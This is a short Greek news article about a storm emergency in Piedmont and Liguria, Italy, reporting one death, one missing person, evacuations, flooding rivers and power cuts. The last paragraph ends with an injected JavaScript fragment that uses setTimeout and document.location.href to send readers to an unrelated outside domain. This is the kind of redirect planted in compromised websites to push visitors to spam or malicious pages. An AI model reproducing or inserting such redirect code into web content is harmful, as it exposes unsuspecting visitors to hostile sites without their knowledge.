Σε κατάσταση έκτακτης ανάγκης η ΒΔ Ιταλία – Ένας νεκρός, ένας αγνοούμενος (BINTEO)

0
6

 

Έως σήμερα το απόγευμα θα διαρκέσει η κατάσταση έκτακτης ανάγκης που έχει εκδώσει η ιταλική κυβέρνηση λόγω σφοδρής κακοκαιρίας για τη βορειοδυτική Ιταλία, στις περιφέρειες Πεδεμόντιο και Λιγουρία.

Ένας ψαράς έχασε τη ζωή του στην περιφέρεια της Γένοβας και ένας κάτοικος της ευρύτερης περιοχής του Τορίνο αγνοείται εξαιτίας της υπερχείλισης ποταμών. Περίπου 450 άνθρωποι αναγκάστηκαν να εγκαταλείψουν τις εστίες τους, που είχαν πλημμυρίσει ή κινδύνευαν από τα ορμητικά νερά.

 

Στο Τορίνο, ο Πάδος έχει ανέβει ένα μέτρο πάνω από τη στάθμη επιφυλακής ενώ και ο ποταμός Τάναρο, στα σύνορα Λιγουρίας και Πεδεμόντιο, απειλεί με νέα υπερχείλιση σειρά από κατοικημένες περιοχές.

 

Οι οδικές και σιδηροδρομικές συνδέσεις συνεχίζουν να είναι προβληματικές ενώ στη διάρκεια της νύχτας η ηλεκτροδότηση διεκόπη σε τουλάχιστον δέκα χωριά. Ο πρωθυπουργός βρίσκεται στο Τορίνο και παρακολουθεί την εξέλιξη της κατάστασης από το επιχειρησιακό κέντρο της Υπηρεσίας Πολιτικής Προστασίας.

Οι υπεύθυνοι της Υπηρεσίας πάντως υπογραμμίζουν ότι ο αποτελεσματικός καθαρισμός των ποταμών και η ενίσχυση των φραγμάτων επέτρεψε να αποφευχθεί ένας πολύ βαρύτερος απολογισμός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here